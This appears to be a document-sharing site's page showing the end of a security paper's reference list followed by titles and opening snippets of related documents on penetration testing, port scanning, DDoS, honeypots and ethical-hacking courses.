[6] Rowland, C.H. Intrusion detection system (IDS). US Patent 6,405,318.
[7] The Wireshark team. Wireshark: The free and open-source packet analyzer.
[8] Greenbone Networks GmbH. OpenVAS: Framework for vulnerability scanning.
[9] MS08-067 vulnerability: Vulnerability in Server Service Could Allow Remote Code Execution.
[10] Various developers, initially the nmap developers. Nmap scripts to automate a wide variety of networking tasks.
[11] Metasploit developers. Meterpreter: Advanced payloads for the Metasploit Framework.
[12] Open Web Application Security Project (OWASP). OWASP is an open-source application security project.
[13] Adobe Systems. Adobe Reader: Used to view and print PDF files.
[14] Virustotal.com, Hispasec Sistemas. Free checking of suspicious files using multiple antivirus engines.
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks
CIT 480: Securing Computer Systems Vulnerability Scanning and Exploitation Frameworks Vulnerability Scanners Vulnerability scanners are automated tools that scan hosts and networks for potential vulnerabilities,
SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.
system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped
SECURING APACHE : DOS & DDOS ATTACKS - II
SECURING APACHE : DOS & DDOS ATTACKS - II How DDoS attacks are performed A DDoS attack has to be carefully prepared by the attackers. They first recruit the zombie army, by looking for vulnerable machines,
Pwning Intranets with HTML5
Javier Marcos de Prado Juan Galiana Lara Pwning Intranets with HTML5 2009 IBM Corporation Agenda How our attack works? How we discover what is in your network? What does your infrastructure tell us for
Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.
Port Scanning Objectives 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Introduction: All machines connected to a LAN or connected to Internet via a modem
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities Learning Objectives Name the common categories of vulnerabilities Discuss common system
Ethical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996
How-to: DNS Enumeration
25-04-2010 Author: Mohd Izhar Ali Email: [email protected] Website: http://johncrackernet.blogspot.com Table of Contents How-to: DNS Enumeration 1: Introduction... 3 2: DNS Enumeration... 4 3: How-to-DNS
CYBER ATTACKS EXPLAINED: PACKET CRAFTING
CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure
EC-Council Certified Security Analyst (ECSA)
EC-Council Certified Security Analyst (ECSA) v8 Eğitim Tipi ve Süresi: 5 Days VILT 5 Day VILT EC-Council Certified Security Analyst (ECSA) v8 Learn penetration testing methodologies while preparing for
Certified Cyber Security Expert V 2.0 + Web Application Development
Summer Training Program Certified Cyber Security Expert V + Web Application Development A] Training Sessions Schedule: Modules Ethical Hacking & Information Security Particulars Duration (hours) Ethical
Metasploit The Elixir of Network Security
Metasploit The Elixir of Network Security Harish Chowdhary Software Quality Engineer, Aricent Technologies Shubham Mittal Penetration Testing Engineer, Iviz Security And Your Situation Would Be Main Goal
McAfee Certified Assessment Specialist Network
McAfee Certified Assessment Specialist Network Exam preparation guide Table of Contents Introduction 3 Becoming McAfee Certified 3 Exam Details 4 Recommended Exam Preparation 4 Exam Objectives 4 Sample
Topics in Network Security
Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
Attack Frameworks and Tools
Network Architectures and Services, Georg Carle Faculty of Informatics Technische Universität München, Germany Attack Frameworks and Tools Pranav Jagdish Betreuer: Nadine Herold Seminar Innovative Internet
Vulnerability analysis
Vulnerability analysis License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents License Contents
Ethical Hacking and Information Security. Foundation of Information Security. Detailed Module. Duration. Lecture with Hands On Session: 90 Hours
Ethical Hacking and Information Security Duration Detailed Module Foundation of Information Security Lecture with Hands On Session: 90 Hours Elements of Information Security Introduction As technology
PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access
The Best First for Beginners who want to become Penetration Testers PTSv2 in pills: Self-paced, online, flexible access 900+ interactive slides and 3 hours of video material Interactive and guided learning
CIT 380: Securing Computer Systems
CIT 380: Securing Computer Systems Scanning CIT 380: Securing Computer Systems Slide #1 Topics 1. Port Scanning 2. Stealth Scanning 3. Version Identification 4. OS Fingerprinting 5. Vulnerability Scanning
Web App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
NETWORK SECURITY WITH OPENSOURCE FIREWALL
NETWORK SECURITY WITH OPENSOURCE FIREWALL Vivek Kathayat,Dr Laxmi Ahuja AIIT Amity University,Noida [email protected] [email protected] ATTACKER SYSTEM: Backtrack 5r3( 192.168.75.10 ) HOST: Backtrack
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
Firewalls and Software Updates
Firewalls and Software Updates License This work by Z. Cliffe Schreuders at Leeds Metropolitan University is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. Contents General
A New Era. A New Edge. Phishing within your company
Phishing within your company Learning Objectives What is phishing and how to minimize its impact Obtain a basic understanding of how to use virtual machines Use BackTrack, a tool used by many security
HONEYD (OPEN SOURCE HONEYPOT SOFTWARE)
HONEYD (OPEN SOURCE HONEYPOT SOFTWARE) Author: Avinash Singh Avinash Singh is a Technical Evangelist currently worksing at Appin Technology Lab, Noida. Educational Qualification: B.Tech from Punjab Technical
Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology
Port Scanning and Vulnerability Assessment ECE4893 Internetwork Security Georgia Institute of Technology Agenda Reconnaissance Scanning Network Mapping OS detection Vulnerability assessment Reconnaissance
FREQUENTLY ASKED QUESTIONS
FREQUENTLY ASKED QUESTIONS Secure Bytes, October 2011 This document is confidential and for the use of a Secure Bytes client only. The information contained herein is the property of Secure Bytes and may
Using Nessus In Web Application Vulnerability Assessments
Using Nessus In Web Application Vulnerability Assessments Paul Asadoorian Product Evangelist Tenable Network Security [email protected] About Tenable Nessus vulnerability scanner, ProfessionalFeed
Introduction. Nmap from an Ethical Hacker's View Part 1. By Kirby Tucker
Nmap from an Ethical Hacker's View Part 1 By Kirby Tucker Editor's Note: Kirby is a long time contributor and supporter of EH-Net. So when he came to me with the idea to do a more approachable tutorial
An Introduction to Network Vulnerability Testing
CONTENTS Introduction 3 Penetration Testing Overview 4 Step 1: Defining the Scope 4 Step 2: Performing the Penetration Test 5 Step 3: Reporting and Delivering Results 6 VeriSign SecureTEST 7 Common Vulnerability
1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding?
Page 1 of 5 1. Introduction The present document explains about common attack scenarios to computer networks and describes with some examples the following features of the MilsGates: Protection against
A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006
IBM TRAINING A43 Modern Hacking Techniques and IP Security By Shawn Mullen Las Vegas, NV 2005 CSI/FBI US Computer Crime and Computer Security Survey 9 out of 10 experienced computer security incident in
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1
Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology Project Proposal 1 Project Proposal 2 Abstract Honeypot systems are readily used by organizations large and
Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)
Page 1 of 6 Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits) TNCC Cybersecurity Program web page: http://tncc.edu/programs/cyber-security Course Description: Encompasses
A Study on the Security aspects of Network System Using Penetration Testing
A Study on the Security aspects of Network System Using Penetration Testing 1 Shwetabh Suman, 2 Vedant Rastogi 1,2 Institute of Engineering and Technology, Alwar, India 1 [email protected] 2 [email protected]
Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix
Cybercrime myths, challenges and how to protect our business Vladimir Kantchev Managing Partner Service Centrix Agenda Cybercrime today Sources and destinations of the attacks Breach techniques How to
Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst
INTEGRATED INTELLIGENCE CENTER Technical White Paper William F. Pelgrin, CIS President and CEO Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst This Center for Internet Security
SAST, DAST and Vulnerability Assessments, 1+1+1 = 4
SAST, DAST and Vulnerability Assessments, 1+1+1 = 4 Gordon MacKay Digital Defense, Inc. Chris Wysopal Veracode Session ID: Session Classification: ASEC-W25 Intermediate AGENDA Risk Management Challenges
Redhawk Network Security, LLC 62958 Layton Ave., Suite One, Bend, OR 97701 [email protected] 866-605- 6328 www.redhawksecurity.
Planning Guide for Penetration Testing John Pelley, CISSP, ISSAP, MBCI Long seen as a Payment Card Industry (PCI) best practice, penetration testing has become a requirement for PCI 3.1 effective July
Protecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
WHITE PAPER. An Introduction to Network- Vulnerability Testing
An Introduction to Network- Vulnerability Testing C ONTENTS + Introduction 3 + Penetration-Testing Overview 3 Step 1: Defining the Scope 4 Step 2: Performing the Penetration Test 5 Step 3: Reporting and
NETWORK PENETRATION TESTING
Tim West Consulting 6807 Wicklow St. Arlington, TX 76002 817-228-3420 [email protected] OVERVIEW Tim West Consulting Tim West Consulting is a full service IT security and support firm that specializes
Course Content: Session 1. Ethics & Hacking
Course Content: Session 1 Ethics & Hacking Hacking history : How it all begin Why is security needed? What is ethical hacking? Ethical Hacker Vs Malicious hacker Types of Hackers Building an approach for
National Cyber League Certified Ethical Hacker (CEH) TM Syllabus
National Cyber League Certified Ethical Hacker (CEH) TM Syllabus Note to Faculty This NCL Syllabus is intended as a supplement to courses that are based on the EC- Council Certified Ethical Hacker TM (CEHv8)
Penetration Testing. Security Testing
Penetration Testing Gleneesha Johnson Advanced Topics in Software Testing Fall 2004 Security Testing Method of risk evaluation Testing security mechanisms to ensure that their functionality is properly
HoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
Virtual Learning Tools in Cyber Security Education
Virtual Learning Tools in Cyber Security Education Dr. Sherly Abraham Faculty Program Director IT and Cybersecurity Dr. Lifang Shih Associate Dean School of Business & Technology, Excelsior College Overview
Information Security. Training
Information Security Training Importance of Information Security Training There is only one way to keep your product plans safe and that is by having a trained, aware and a conscientious workforce. - Kevin
Secure Software Programming and Vulnerability Analysis
Secure Software Programming and Vulnerability Analysis Christopher Kruegel [email protected] http://www.auto.tuwien.ac.at/~chris Operations and Denial of Service Secure Software Programming 2 Overview
Introduction to Network Security Lab 2 - NMap
Introduction to Network Security Lab 2 - NMap 1 Introduction: Nmap as an Offensive Network Security Tool Nmap, short for Network Mapper, is a very versatile security tool that should be included in every
Host Discovery with nmap
Host Discovery with nmap By: Mark Wolfgang [email protected] November 2002 Table of Contents Host Discovery with nmap... 1 1. Introduction... 3 1.1 What is Host Discovery?... 4 2. Exploring nmap s Default
Audience. Pre-Requisites
T R A N C H U L A S W O R K S H O P S A N D T R A I N I N G S Hands-On Penetration Testing Training Course About Tranchulas Tranchulas is a multinational information security company having its offices
(maybe?)apt1: technical backstage
(maybe?)apt1 : technical backstage (maybe?)apt1: technical backstage @r00tbsd Paul Rascagnères Malware.lu December 2013 Crusaders are everywhere... A poke to Hendrik Adrian... #MalwareMustDie Plan - Malware.lu
Kautilya: Teensy beyond shells
Kautilya: Teensy beyond shells Kautilya Toolkit for Teensy device Nikhil Mittal 1 P a g e Contents Kautilya Toolkit for Teensy device... 1 Nikhil Mittal... 1 Abstract... 3 Attack Surface and Scenarios...
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík
Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík {celeda velan jirsik}@ics.muni.cz Part I Introduction P. Čeleda et al. Network Security Monitoring and Behavior
Penetration Testing SIP Services
Penetration Testing SIP Services Using Metasploit Framework Writer Version : 0.2 : Fatih Özavcı (fatih.ozavci at viproy.com) Introduction Viproy VoIP Penetration Testing Kit Sayfa 2 Table of Contents 1
Banking Security using Honeypot
Banking Security using Honeypot Sandeep Chaware D.J.Sanghvi College of Engineering, Mumbai [email protected] Abstract New threats are constantly emerging to the security of organization s information
Firewalls, Tunnels, and Network Intrusion Detection
Firewalls, Tunnels, and Network Intrusion Detection 1 Part 1: Firewall as a Technique to create a virtual security wall separating your organization from the wild west of the public internet 2 1 Firewalls
